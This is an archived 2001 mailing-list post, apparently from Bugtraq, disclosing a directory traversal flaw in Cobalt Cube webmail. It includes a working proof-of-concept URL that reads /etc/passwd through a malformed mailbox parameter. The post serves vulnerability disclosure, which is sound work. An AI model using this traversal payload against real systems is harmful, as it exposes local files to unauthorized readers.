Cobalt Cube Webmail directory traversal

From: KF (dotslashat_private)
Date: Thu Jul 05 2001 - 00:41:50 PDT

Next message: H D Moore: "Re: [BUGTRAQ] php breaks safe mode"

Previous message: Fyodor: "Re: Solaris 8 libsldap exploit"
Next in thread: Paul Marshall: "Re: Cobalt Cube Webmail directory traversal"
Reply: Paul Marshall: "Re: Cobalt Cube Webmail directory traversal"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I just got a new Cobalt Cube today and I have been poking around at it
for security issues... I noticed this minor issue in the webmail system.
Your 
users are not aloud to have shell access by default however if they
malform their mailbox requests they can read local files with the perms
of the webserver. If your users have shell access they will not really
be gaining anything however this could be used to remotely gather
information for a future attack. 

[admin admin]$ uname -a
Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown
[admin admin]$ cat /etc/issue
 
Cobalt Linux release 6.0 (Carmel)
Kernel 2.2.16C7 on an i586

http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1

-KF

image/png attachment: webmail.png

Next message: H D Moore: "Re: [BUGTRAQ] php breaks safe mode"
Previous message: Fyodor: "Re: Solaris 8 libsldap exploit"
Next in thread: Paul Marshall: "Re: Cobalt Cube Webmail directory traversal"
Reply: Paul Marshall: "Re: Cobalt Cube Webmail directory traversal"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jul 05 2001 - 21:35:33 PDT